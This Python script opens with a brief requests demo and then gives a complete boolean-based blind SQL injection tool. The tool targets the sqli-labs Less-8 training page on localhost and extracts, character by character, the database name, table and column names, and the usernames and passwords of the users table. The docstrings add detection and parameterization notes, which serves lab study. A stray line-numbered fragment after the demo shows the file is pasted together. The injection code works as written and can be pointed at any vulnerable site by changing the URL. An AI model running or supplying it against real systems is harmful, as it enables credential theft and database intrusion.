# coding = utf-8
import requests
# Minimal requests demo: fetch one page and print four views of the result.
# NOTE: the URL is plain http://, so the body is not integrity-protected in
# transit, and no timeout is passed, so a stalled server blocks the script.
url = 'http://www.baidu.com'
ret = requests.get(url)
for view in (
    type(ret),    # the object's class: <class 'requests.models.Response'>
    ret,          # its repr, e.g. <Response [200]>
    ret.text,     # body as text (str)
    ret.content,  # body as raw bytes
):
    print(view)
1 # coding:utf-8
2 import requests
3
# Get the length of the database name
def database_len():
    """Print the length of the current database name, found via a true/false oracle.

    For N = 1..9 the function requests the local sqli-labs Less-8 page with
    ``id=1' and length(database())>N`` and treats the text 'You are in' in
    the response body as "condition true". Each N that is still true is
    printed; the first N for which the marker is missing is printed as
    ``database_length:`` and the loop stops. If the marker is present for
    every N, no length is reported. Nothing is returned.

    Defensive notes: the probe presumably works because the lab page places
    ``id`` directly into its SQL text (confirm against the lab source); a
    parameterized query removes the oracle. Every request carries
    ``length(database())`` in the query string, so the run is visible in
    web-server access logs. No timeout is set on the requests.
    """
    endpoint = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
    for candidate in range(1, 10):
        condition = '''?id=1' and length(database())>%s''' % candidate
        # '%23' is a URL-encoded '#', appended after the injected condition.
        reply = requests.get(endpoint + condition + '%23')
        if 'You are in' not in reply.text:
            # First N for which "length > N" is false: N is the length.
            print('database_length:', candidate)
            break
        print(candidate)
# Module-level call: the length probe runs as soon as this file is executed.
database_len()
# Get the database name
def database_name():
    """Print the current database name, recovered one character at a time.

    For positions 1..8 the function tries each character of a 62-symbol
    alphabet (digits, upper case, lower case) in the condition
    ``substr(database(),pos,1)='c'`` against the local sqli-labs Less-8
    page. The text 'You are in' in the response marks a match; the matching
    character is appended, the partial result is printed, and the search
    moves to the next position. The final string is printed with the
    ``database_name:`` label. Nothing is returned.

    Limits visible in the code: a position whose character is not in the
    alphabet adds nothing to the result, and all 8 positions are always
    probed. NOTE(review): if the server compares strings case-insensitively
    (confirm for this lab), an upper-case candidate matches first, so the
    letter case of the output is not reliable.

    Defensive notes: a full run issues up to 8 x 62 sequential GET requests
    whose ``id`` parameter contains ``substr(database(),...)``; that pattern
    stands out in access logs. Binding ``id`` as a query parameter on the
    server side removes the oracle.
    """
    recovered = ''
    for position in range(1, 9):
        for candidate in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
            probe = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" % (
                position, candidate)
            reply = requests.get(probe + '%23')
            if 'You are in' not in reply.text:
                continue
            # Marker present: this candidate is the character at `position`.
            recovered += candidate
            print(recovered)
            break
    print('database_name:', recovered)
# Module-level call: the name probe runs as soon as this file is executed.
database_name()
# Get the tables of the database
def tables_name():
    """Print the comma-joined table names of the current database.

    The condition compares single characters of
    ``group_concat(table_name)`` (from ``information_schema.tables``,
    restricted to ``table_schema=database()``) with each candidate in
    'a'..'z' plus ','. Positions 1..29 are probed against the local
    sqli-labs Less-8 page, and 'You are in' in the response marks a match.
    Partial results are printed as they grow; the final string is printed
    with the ``table_name:`` label. Nothing is returned.

    Limits visible in the code: only the first 29 characters are covered,
    and a character outside the candidate set (digit, underscore, upper
    case) adds nothing at its position.

    Defensive notes: the query depends on the application's database
    account being able to read ``information_schema``, and on ``id`` being
    placed into the SQL text (presumably the case in this lab — confirm).
    Up to 29 x 27 requests containing ``information_schema.tables`` appear
    in the access log during a run.
    """
    collected = ''
    alphabet = 'abcdefghijklmnopqrstuvwxyz,'
    for offset in range(1, 30):
        for symbol in alphabet:
            target = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
                offset, symbol)
            answer = requests.get(target + '%23')
            matched = 'You are in' in answer.text
            if matched:
                collected = collected + symbol
                print(collected)
                break
    print('table_name:', collected)
# Module-level call: the table probe runs as soon as this file is executed.
tables_name()
# Get the columns of the table
def columns_name():
    """Print the comma-joined column names of the ``users`` table.

    The condition compares single characters of
    ``group_concat(column_name)`` (from ``information_schema.columns``,
    restricted to ``table_schema=database()`` and ``table_name='users'``)
    with each candidate in 'a'..'z' plus ','. Positions 1..29 are probed
    against the local sqli-labs Less-8 page, and 'You are in' in the
    response marks a match. Partial results are printed as they grow; the
    final string is printed with the ``column_name:`` label. Nothing is
    returned.

    Limits visible in the code: the table name is hard-coded, only the
    first 29 characters are covered, and a character outside the candidate
    set adds nothing at its position.

    Defensive notes: schema metadata is readable here only through the
    application's own database account; restricting that account and
    binding ``id`` as a parameter both close this path. Up to 29 x 27
    requests containing ``information_schema.columns`` appear in the access
    log during a run.
    """
    found = ''
    for index in range(1, 30):
        for letter in 'abcdefghijklmnopqrstuvwxyz,':
            request_url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
                index, letter)
            page = requests.get(request_url + '%23').text
            if 'You are in' not in page:
                continue
            found += letter
            print(found)
            break
    print('column_name:', found)
# Module-level call: the column probe runs as soon as this file is executed.
columns_name()
# Get the username values
def username_value():
    """Print the comma-joined ``username`` values of the ``users`` table.

    The condition compares single characters of
    ``group_concat(username)`` with each candidate in digits, 'a'..'z',
    ',', '_' and '-'. Positions 1..99 are probed against the local
    sqli-labs Less-8 page, and 'You are in' in the response marks a match.
    Partial results are printed as they grow; the final string is printed
    with the ``username_value:`` label. Nothing is returned.

    Limits visible in the code: only the first 99 characters are covered,
    and a character outside the 39-symbol candidate set adds nothing at its
    position.

    Defensive notes: a run issues up to 99 x 39 sequential GET requests to
    one URL, differing only in the ``substr(...)`` position and the
    compared character; request-rate and query-string monitoring both
    catch this. Binding ``id`` as a query parameter removes the oracle.
    """
    value = ''
    charset = '0123456789abcdefghijklmnopqrstuvwxyz,_-'
    for place in range(1, 100):
        for ch in charset:
            link = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
                place, ch)
            result = requests.get(link + '%23')
            if 'You are in' in result.text:
                value = value + ch
                print(value)
                break
    print('username_value:', value)
# Module-level call: the username probe runs as soon as this file is executed.
username_value()
# Get the password values
def password_value():
    """Print the comma-joined ``password`` values of the ``users`` table.

    The condition compares single characters of
    ``group_concat(password)`` with each candidate in digits, 'a'..'z',
    ',', '_' and '-'. Positions 1..99 are probed against the local
    sqli-labs Less-8 page, and 'You are in' in the response marks a match.
    Partial results are printed as they grow; the final string is printed
    with the ``password_value:`` label. Nothing is returned.

    Limits visible in the code: only the first 99 characters are covered,
    and a character outside the 39-symbol candidate set adds nothing at its
    position.

    Defensive notes: whatever is stored in ``users.password`` is only as
    protected as the query layer in front of it, so credentials should be
    kept as salted, slow hashes, which makes a leak of this column not
    directly usable. A run issues up to 99 x 39 sequential GET requests
    whose ``id`` parameter contains ``group_concat(password)``, which is a
    clear signal in access logs.
    """
    secret = ''
    for slot in range(1, 100):
        for guess in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            address = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
                slot, guess)
            body = requests.get(address + '%23').text
            if 'You are in' not in body:
                continue
            secret += guess
            print(secret)
            break
    print('password_value:', secret)
# Module-level call: the password probe runs as soon as this file is executed.
password_value()